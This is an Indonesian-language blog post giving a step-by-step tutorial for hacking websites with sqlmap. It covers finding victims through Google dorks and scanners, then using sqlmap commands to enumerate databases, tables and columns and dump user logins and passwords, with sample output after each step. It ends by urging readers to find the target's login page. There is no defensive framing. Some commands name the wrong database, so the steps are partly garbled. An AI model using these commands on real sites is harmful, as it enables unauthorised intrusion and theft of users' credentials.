cara Hack Website dengan Sqlmap

January 7, 2017

cara Hack Website dengan Sqlmap

Halo google ..... hari ini kita akan membahas tentang cara meretas situs web menggunakan sqlmap

Baiklah, mari kita mulai ...

pertama ... jika Anda menggunakan kali linux, sqlmap telah diinstal.

Sekarang buka terminal Anda

1. Anda harus menemukan target Anda dengan menggunakan google dork.

2. Jika Anda memiliki target Anda sendiri tanpa menggunakan google dork Anda juga dapat memindai kerentanan target Anda dengan menggunakan uniscan atau w3af

3. Baiklah setelah Anda memiliki target kemudian buka sqlmap di terminal

4. ketik sqlmap -u http://www.target.com/phd?id=2 --dbs

5. jika Anda berhasil, Anda akan melihat ini
[INFO] retrieved: information_schema
[INFO] retrieved: sqldummywebsite

6. Kemudian ketik sqlmap -u http://www.target.com/phd?id=2 -D information_scheme --tables

7. Anda akan melihat ini
[10:56:22] [INFO] heuristics detected web page charset
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

8. Allright type Kemudian ketik sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info --columns

9. Tampilannya seperti ini

[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

10. then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info -C user_id,user_login,user_password --dump

11. Taraaa Done ..... Selanjutnya pekerjaan Anda masih belum selesai ,, Anda harus menemukan halaman login target.

12. Ok sampai jumpa di postingan selanjutnya

ahdeen

I have rich experience in security system & internet security. Also I am journalist for technology and other stuff section. Also i love learning a new language. Feel free to contact me writing an email with your project idea.

zvilsec

January 7, 2017

cara Hack Website dengan Sqlmap

0 Comment:

Post a Comment

Recent Post

Popular Posts

Adress/Street

Phone number

Email